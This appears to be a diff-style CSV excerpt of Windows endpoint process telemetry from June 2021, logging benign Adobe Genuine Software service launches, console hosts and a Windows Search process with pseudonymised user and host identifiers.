+1445,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:18:06.624598700+00:00,13392,AGSService.exe,"""AGSService.exe"" \\.\pipe\gc_pipe_qwotvz 3",PortableExecutable,2018-05-11 03:50:54+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,3548360,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.806850600+00:00,4476,AGSService.exe,"""AGSService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:18:06.752376500+00:00,2021-06-23 01:19:37.516186400+00:00,eb5b7528-b502-4ef0-b151-dafcb5b076a1,computerpii_0a470890c60768167990033d701e7bd881398861,157564,False,10.7740.19041.1052,False,11540474045136989,,11540474045172293,2021-06-10 00:46:11.806850600+00:00,4476,2021-06-10 00:46:11.806850600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,4476,2176,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3548360,2021-02-17 03:27:16+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.831368700+00:00,2018-05-11 03:50:54+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service
+1446,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:18:06.639639+00:00,17032,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:18:06.624598700+00:00,13392,AGSService.exe,"""AGSService.exe"" \\.\pipe\gc_pipe_qwotvz 3",False,2021-06-10 00:46:11.806850600+00:00,4476,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:18:06.752737500+00:00,2021-06-23 01:19:37.516277600+00:00,12579e0f-71fb-450c-a719-171170ee87c4,computerpii_0a470890c60768167990033d701e7bd881398861,157565,False,10.7740.19041.1052,False,11540474045172293,,11540474045172294,2021-06-23 01:18:06.624598700+00:00,13392,2021-06-23 01:18:06.624598700+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,13392,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3548360,2021-02-17 03:27:16+00:00,2021-02-16 19:38:26+00:00,2021-06-23 01:18:06.657059200+00:00,2018-05-11 03:50:54+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1447,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:18:06.794491700+00:00,19412,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_xohlrt 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:18:06.896354+00:00,2021-06-23 01:19:37.516454900+00:00,58dbb0e2-e717-4e7b-8538-8ab3fcf6a1f3,computerpii_0a470890c60768167990033d701e7bd881398861,157567,False,10.7740.19041.1052,False,11540474045136991,,11540474045172295,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,128,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+1448,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:18:06.804514900+00:00,14412,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:18:06.794491700+00:00,19412,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_xohlrt 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:18:06.896705800+00:00,2021-06-23 01:19:37.516547800+00:00,005a5358-8f4c-4dbd-bbb5-fa5c7c986423,computerpii_0a470890c60768167990033d701e7bd881398861,157568,False,10.7740.19041.1052,False,11540474045172295,,11540474045172296,2021-06-23 01:18:06.794491700+00:00,19412,2021-06-23 01:18:06.794491700+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,19412,16512,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-23 00:53:46.229988300+00:00,2020-09-22 19:30:00+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1449,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:18:07.058511600+00:00,11428,AGSService.exe,"""AGSService.exe"" \\.\pipe\gc_pipe_ncdbgp 3",PortableExecutable,2018-05-11 03:50:54+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,3548360,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.806850600+00:00,4476,AGSService.exe,"""AGSService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:18:07.227892300+00:00,2021-06-23 01:19:37.516808100+00:00,77e332af-f3ec-424f-9aa3-4fb7d9c941f0,computerpii_0a470890c60768167990033d701e7bd881398861,157571,False,10.7740.19041.1052,False,11540474045136989,,11540474045172298,2021-06-10 00:46:11.806850600+00:00,4476,2021-06-10 00:46:11.806850600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,4476,2176,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3548360,2021-02-17 03:27:16+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.831368700+00:00,2018-05-11 03:50:54+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service
+1450,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:18:07.066878300+00:00,17500,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:18:07.058511600+00:00,11428,AGSService.exe,"""AGSService.exe"" \\.\pipe\gc_pipe_ncdbgp 3",False,2021-06-10 00:46:11.806850600+00:00,4476,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:18:07.228433300+00:00,2021-06-23 01:19:37.516900400+00:00,7efae9f8-41f3-4780-9838-3698091564ab,computerpii_0a470890c60768167990033d701e7bd881398861,157572,False,10.7740.19041.1052,False,11540474045172298,,11540474045172299,2021-06-23 01:18:07.058511600+00:00,11428,2021-06-23 01:18:07.058511600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,11428,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3548360,2021-02-17 03:27:16+00:00,2021-02-16 19:38:26+00:00,2021-06-23 01:18:06.657059200+00:00,2018-05-11 03:50:54+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1451,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:18:07.218814700+00:00,11164,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_aqjqju 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:18:07.232583600+00:00,2021-06-23 01:19:37.516993900+00:00,c1a80a52-e397-4f1b-9508-c72cd5d1d301,computerpii_0a470890c60768167990033d701e7bd881398861,157573,False,10.7740.19041.1052,False,11540474045136991,,11540474045172300,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,128,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+1452,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:18:07.227707400+00:00,16448,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:18:07.218814700+00:00,11164,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_aqjqju 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:18:07.324909200+00:00,2021-06-23 01:19:37.517259800+00:00,61a1201b-c310-41c5-9ea0-14b274f8143b,computerpii_0a470890c60768167990033d701e7bd881398861,157576,False,10.7740.19041.1052,False,11540474045172300,,11540474045172301,2021-06-23 01:18:07.218814700+00:00,11164,2021-06-23 01:18:07.218814700+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,11164,16512,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-23 00:53:46.229988300+00:00,2020-09-22 19:30:00+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1453,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:57:00.949529600+00:00,18024,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe642_ Global\UsGthrCtrlFltPipeMssGthrPipe642 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon"" ",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:57:01.102994700+00:00,2021-06-23 01:59:05.206534500+00:00,6b1a71f3-7802-47d1-972f-a9e9f62fbf54,computerpii_0a470890c60768167990033d701e7bd881398861,159465,False,10.7740.19041.1052,False,11540474045144190,,11540474045172615,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+1454,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:57:01.882701300+00:00,2932,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a02968"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a02968""",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,323272,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:57:01.899538+00:00,2021-06-23 01:59:05.206773500+00:00,3c524bc8-2ba3-4c87-af75-fb648c95fcf9,computerpii_0a470890c60768167990033d701e7bd881398861,159473,False,10.7740.19041.1052,False,11540474045136991,,11540474045172624,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,128,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility
